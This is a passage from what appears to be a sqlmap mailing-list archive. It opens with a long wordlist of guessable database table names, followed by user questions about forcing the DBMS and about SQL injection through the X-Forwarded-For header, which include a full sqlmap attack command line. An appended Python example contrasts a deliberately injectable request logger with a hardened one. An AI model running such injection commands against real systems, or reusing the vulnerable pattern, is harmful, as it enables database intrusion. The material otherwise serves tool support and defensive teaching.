sent_mails seq_gen server servers service_request service_request_log services services_links sessions setting setup_ sf_guard_group sf_guard_group_permission sf_guard_permission sf_guard_remember_key sf_guard_user sf_guard_user_group sf_guard_user_permission sga_xplan_test shared_secret_identity shared_secrets shipment shipment_line shipping shipto shop.cards shop.orders shop_settings sic sidebar sing singin singup siteIndexTable site_climatic site_environment site_iwis site_location site_logins site_map_ge site_stats site_wtype sitelogins sites situacaoitem size sizes skins slow_log slserver smallnuke_members smf_members snipe_gallery_cat soc_da_polit_ge software software_licenses softwares solde solicitacao solicitacaosenha song sons soraldo_ele_tipo sort sounds source 
special_category specialty spip_articles spip_auteurs spip_auteurs_articles spip_auteurs_messages spip_auteurs_rubriques spip_breves spip_caches spip_documents spip_documents_articles spip_documents_breves spip_documents_rubriques spip_forum spip_groupes_mots spip_index spip_index_dico spip_messages spip_meta spip_mots spip_mots_articles spip_mots_breves spip_mots_documents spip_mots_forum spip_mots_rubriques spip_mots_syndic spip_ortho_cache spip_ortho_dico spip_petitions spip_referers spip_referers_articles spip_rubriques spip_signatures spip_syndic spip_syndic_articles spip_types_documents spip_versions spip_versions_fragments spip_visites spip_visites_articles sporti_ge spt_datatype_info spt_datatype_info_ext spt_provider_types sse_estudante sse_familia staff staff_db standort stars stars_in_movies state statename statistics statistiques stats statuses std_item stellen stkWeight stnuser stone list store store1 store2 store3 store4 stores stories ststaff studierende study study_text study_user stuser stuseres stusers subImageInfo subscriber subscribers super superuser synchro_element synchro_type sys sys_acl_actions sys_acl_matrix sys_options_cats sysadmin sysadmins sysconstraints sysmaps sysmaps_hosts sysmaps_links sysmergeschemaarticles syssegments system systime sysuser sysusers t1 t_peep t_snap t_stat table_user tables tables_priv tag taikhoan taikhoanquantri tameio tamio tamio_pelates task task_param tax taxon taxonomy tb_account tb_accounts tb_admin tb_administrator tb_admins tb_login tb_logins tb_member tb_members tb_nguoidung tb_nguoidungs tb_user tb_useraccount tb_useraccounts tb_username tb_usernames tb_users tbaccount tbaccounts tbadmin tbadmins tbl tblArtistCategory tblArtists tblConfigs tblLayouts tblLogBookAuthor tblLogBookEntry tblLogBookImages tblLogBookImport tblLogBookUser tblMails tblNewCategory tblNews tblOrders tblRestrictedPasswords tblRestrictedShows tblStoneCategory tblStones tblUser tblWishList tbl_account tbl_accounts tbl_admin 
tbl_admins tbl_categories tbl_client tbl_clients tbl_country tbl_event tbl_login tbl_logins tbl_member tbl_members tbl_nguoidung tbl_nguoidungs tbl_state tbl_tbadmin tbl_tech tbl_user tbl_useraccount tbl_useraccounts tbl_users tbl_works tbl_works_categories tbl_works_clients tbl_works_tech tblaccount tblaccounts tbladmin tbladmins tblblogcategories tblblogcomments tblblogentries tblblogentriescategories tblblogentriesrelated tblblogpages tblblogroles tblblogsearchstats tblblogsubscribers tblblogtextblocks tblblogtrackbacks tblclient tblclients tbllogin tbllogins tblmanager tblmanagers tblnguoidung tblnguoidungs tblogin tblogins tblproduct tblproducts tblservers tbluseraccount tbluseraccounts tbluserroles tbnguoidung tbnguoidungs tbuser tbuseraccount tbuseraccounts tbusers team telecharger telefone telefono telephone templatelinks terms test test_user test_users tester tests text tf_cookies tf_links tf_log tf_messages tf_rss tf_settings tf_users the theday themes tickers time_zone time_zone_leap_second time_zone_name time_zone_transition time_zone_transition_type timeperiod tipo_bolsa tipodeducao tissue tmp topic topicpublication topics track trackbacks trade traffic_selectors transaction transcache transfers translation transport trier trigger_depends triggers triggers_template trivia ts2_server_privileges tt_address tt_content turizmi_ge turns tuser tusers tutorial tx_tcdirectmail_bounceaccount tx_tcdirectmail_clicklinks tx_tcdirectmail_lock tx_tcdirectmail_sentlog tx_tcdirectmail_targets tx_templavoila_datastructure type typeFacture typeProduit typecompte u u_n u_name u_p u_pass uid un uname uniquetest uplebata_dacva_ge upload uploads url us usebb_members userAttribute userImageRating userInfo userSession user_admin user_connection user_defined_attribute user_groups user_id user_info user_list user_login user_logins user_name user_names user_newtalk user_nm user_online_newyear user_pass user_passw user_passwd user_password user_preferences user_pw user_pwd 
user_pword user_pwrd user_rights user_role user_test user_type_link user_types user_un user_uname user_uploads_pictures user_usern user_username user_usernm user_usrnm useraccount useraccounts usercontrol useres userfiles userid userlist userlistuser_list userlogins usern username usernames usernm userpass userpasswd userpassword userpwd userrights users_club users_sessions users_test users_tmp userstbl usertbl usr usr2 usr_n usr_name usr_pass usr_pw usrnam usrname usrnm usrpass usrs usuarios utente utenti utilisateur utilise utlisateur uvw_Category uvw_Pref uvw_Preferences valhalla variable_interest vars vb_user vbulletin_session vbulletin_user vcd vcd_Borrowers vcd_Comments vcd_CoverTypes vcd_Covers vcd_CoversAllowedOnMediatypes vcd_IMDB vcd_Images vcd_Log vcd_MediaTypes vcd_MetaData vcd_MetaDataTypes vcd_MovieCategories vcd_PornCategories vcd_PornStudios vcd_Pornstars vcd_PropertiesToUser vcd_RssFeeds vcd_Screenshots vcd_Sessions vcd_Settings vcd_SourceSites vcd_UserLoans vcd_UserProperties vcd_UserRoles vcd_UserWishList vcd_Users vcd_VcdToPornCategories vcd_VcdToPornStudios vcd_VcdToPornstars vcd_VcdToSources vcd_VcdToUsers vendedores vendor vendor_seq vendor_types vendors vendortax venues veranstalter verkaeufer versandkostenpreise version_data vertex vertreter verwalten verwaltet video videos viewLogBookEntry viewStoneArtist views_track viktorina_ge vip virgator_table vis_typen visits visual voodoo_members voraussetzen vote voting vrls_listing_images vrls_listings vrls_partners vrls_xref_country vrls_xref_listing_offer_type vrls_xref_listing_type vrls_xref_state_province vwListAllAvailable vykachka warehouse watchlist way_nodes ways webadmin webadmins webapps webcal_asst webcal_categories webcal_config webcal_entry_ext_user webcal_entry_log webcal_entry_repeats webcal_entry_repeats_not webcal_group webcal_group_user webcal_import webcal_import_data webcal_nonuser_cals webcal_report webcal_report_template webcal_site_extras webcal_user webcal_user_layers 
webcal_view webcal_view_user webmasters webusers wh_der_children wh_man_children win windows words work_orders wp1_categories wp1_comments wp_categories wp_comments wp_linkcategories wp_links wp_options wp_pod_fields wp_pod_pages wp_pod_types wp_pod_widgets wp_post2cat wp_postmeta wp_posts wp_term_relationships wp_term_taxonomy wp_terms wp_usermeta wp_users writer writes wsop x_admin x_world xar_roles xmldocument xoops_bannerclient xoops_users xristes yabb_settings yabbse_settings yearend yhm yhmm zahlung_weitere zipcodes zips zl_admin zl_advertisement zl_article zl_baoming zl_deeds zl_finance zl_media zo_gruppe_stelle zo_kontakt_stelle zones zoph_albums zoph_categories zoph_color_schemes zoph_people zoph_prefs zoph_users zuseserver zusti_da_sabuneb_ge zutat zutat_cocktail |
From: Miroslav S. <mir...@gm...> - 2012-06-20 14:00:37
|
Hi Iago.

You can force it. Right afterward you were probably asked by sqlmap something like this:

"you provided 'microsoft sql server' as back-end DBMS, but from a past scan information on the target URL sqlmap assumes the back-end DBMS is mysql. Do you really want to force the back-end DBMS value? [y/N]"

To prevent confusion, that INFO message is now (with latest commit r5132) written only if you press "Y" in that message. Also, that YES is not a default setting because we expect users in those kinds of situations to forget the wrong "--dbms=.." from an old run.

Kind regards,
Miroslav Stampar

On Wed, Jun 20, 2012 at 3:49 PM, Iago Sousa <146...@gm...> wrote:
> Why, when I put --dbms, is sqlmap still resuming from the session file? Can't I
> force sqlmap to use a specific DBMS?
>
> Here is the output:
> [10:48:05] [INFO] resuming back-end DBMS 'mysql 5' from session file
>
> --
> Regards,
> Iago Sousa

--
Miroslav Stampar
http://about.me/stamparm |
From: Iago S. <146...@gm...> - 2012-06-20 13:50:07
|
Why, when I put --dbms, is sqlmap still resuming from the session file? Can't I force sqlmap to use a specific DBMS?

Here is the output:
[10:48:05] [INFO] resuming back-end DBMS 'mysql 5' from session file

--
Regards,
Iago Sousa |
From: Anton S. <ant...@gm...> - 2012-06-18 17:12:39
|
Thanks, Miroslav, do appreciate this.

Have a wonderful day.

Anton.

On Mon, Jun 18, 2012 at 8:14 PM, Miroslav Stampar <mir...@gm...> wrote:
> Hi Anton.
>
> This is currently not supported. We'll inform you when it will.
>
> Kind regards,
> Miroslav Stampar
>
> On Mon, Jun 18, 2012 at 5:25 PM, Anton Sazonov <hy...@ef...> wrote:
>>
>> Hello everyone,
>>
>> I have an application that is injectable using the 'x-forwarded-for'
>> custom HTTP header. While I can specify it with --headers, I can't
>> seem to find a way to use it as an injection point:
>>
>> C:\sqlmap>python sqlmap.py -u "http://www.example.com/index.php" --headers "x-forwarded-for: 1" --level 5 --risk 3 --dbms mysql --threads 10 -p "x-forwarded-for"
>>
>> sqlmap/1.0-dev (r5112) - automatic SQL injection and database takeover tool
>> http://www.sqlmap.org
>>
>> [10:50:04] [CRITICAL] all testable parameters you provided are not present within the GET, POST and Cookie parameters
>>
>> Is that expected behavior or am I missing something?
>>
>> Thank you,
>> Anton
>
> --
> Miroslav Stampar
> http://about.me/stamparm |
From: Miroslav S. <mir...@gm...> - 2012-06-18 16:14:48
|
Hi Anton.

This is currently not supported. We'll inform you when it will.

Kind regards,
Miroslav Stampar

On Mon, Jun 18, 2012 at 5:25 PM, Anton Sazonov <hy...@ef...> wrote:
> Hello everyone,
>
> I have an application that is injectable using the 'x-forwarded-for'
> custom HTTP header. While I can specify it with --headers, I can't
> seem to find a way to use it as an injection point:
>
> C:\sqlmap>python sqlmap.py -u "http://www.example.com/index.php" --headers "x-forwarded-for: 1" --level 5 --risk 3 --dbms mysql --threads 10 -p "x-forwarded-for"
>
> sqlmap/1.0-dev (r5112) - automatic SQL injection and database takeover tool
> http://www.sqlmap.org
>
> [10:50:04] [CRITICAL] all testable parameters you provided are not present within the GET, POST and Cookie parameters
>
> Is that expected behavior or am I missing something?
>
> Thank you,
> Anton

--
Miroslav Stampar
http://about.me/stamparm |
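The X-Forwarded-For case discussed in this thread, seen from the application side, as an added example that is not part of the thread or of sqlmap: a request logger that concatenates the header into SQL next to a version that validates the value and binds it as a parameter. The `visits` table, the function names, `TRUSTED_PROXIES` and the sample header values are all constructed for illustration.

```python
import ipaddress
import sqlite3

# Assumption for this example: exactly one reverse proxy, on localhost,
# is allowed to tell the application who the client is.
TRUSTED_PROXIES = {"127.0.0.1"}


def make_db():
    """In-memory database with a hypothetical request-log table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE visits (ip TEXT, path TEXT)")
    return db


def get_header(headers, name):
    """HTTP header names are case-insensitive; look the header up that way."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return None


def log_visit_vulnerable(db, headers, path):
    """Weak form: header text is pasted straight into the statement,
    so whatever the client sent is parsed as SQL."""
    ip = get_header(headers, "X-Forwarded-For") or ""
    db.execute("INSERT INTO visits (ip, path) VALUES ('%s', '%s')" % (ip, path))


def client_ip(headers, peer_addr):
    """Return an address that is safe to store.

    The header is honoured only when the TCP peer is a trusted proxy, only
    the right-most entry (the one that proxy appended) is used, and it must
    parse as an IP address. Anything else falls back to the peer address.
    """
    if peer_addr not in TRUSTED_PROXIES:
        return peer_addr
    xff = get_header(headers, "X-Forwarded-For")
    if not xff:
        return peer_addr
    candidate = xff.split(",")[-1].strip()
    try:
        return str(ipaddress.ip_address(candidate))
    except ValueError:
        return peer_addr


def log_visit_hardened(db, headers, peer_addr, path):
    """Hardened form: validated value, bound as a parameter (never parsed as SQL)."""
    ip = client_ip(headers, peer_addr)
    db.execute("INSERT INTO visits (ip, path) VALUES (?, ?)", (ip, path))
    return ip


def stored_ips(db):
    """Addresses written to the log so far, in insertion order."""
    return [row[0] for row in db.execute("SELECT ip FROM visits ORDER BY rowid")]


if __name__ == "__main__":
    db = make_db()
    # Constructed header value: a stray quote is enough to show the header
    # reaches the SQL parser in the weak form.
    malformed = {"x-forwarded-for": "203.0.113.7'x"}
    try:
        log_visit_vulnerable(db, malformed, "/index.php")
    except sqlite3.OperationalError as exc:
        print("vulnerable logger: header text was parsed as SQL ->", exc)

    print("hardened, malformed header:",
          log_visit_hardened(db, malformed, "127.0.0.1", "/index.php"))
    print("hardened, valid header via proxy:",
          log_visit_hardened(db, {"X-Forwarded-For": "203.0.113.7"},
                             "127.0.0.1", "/index.php"))
    print("hardened, header from untrusted peer:",
          log_visit_hardened(db, {"X-Forwarded-For": "203.0.113.7"},
                             "198.51.100.20", "/index.php"))
    print("rows stored:", stored_ips(db))
```

A SQL syntax error in the application log that coincides with an unusual X-Forwarded-For value is the signal worth alerting on for the weak form.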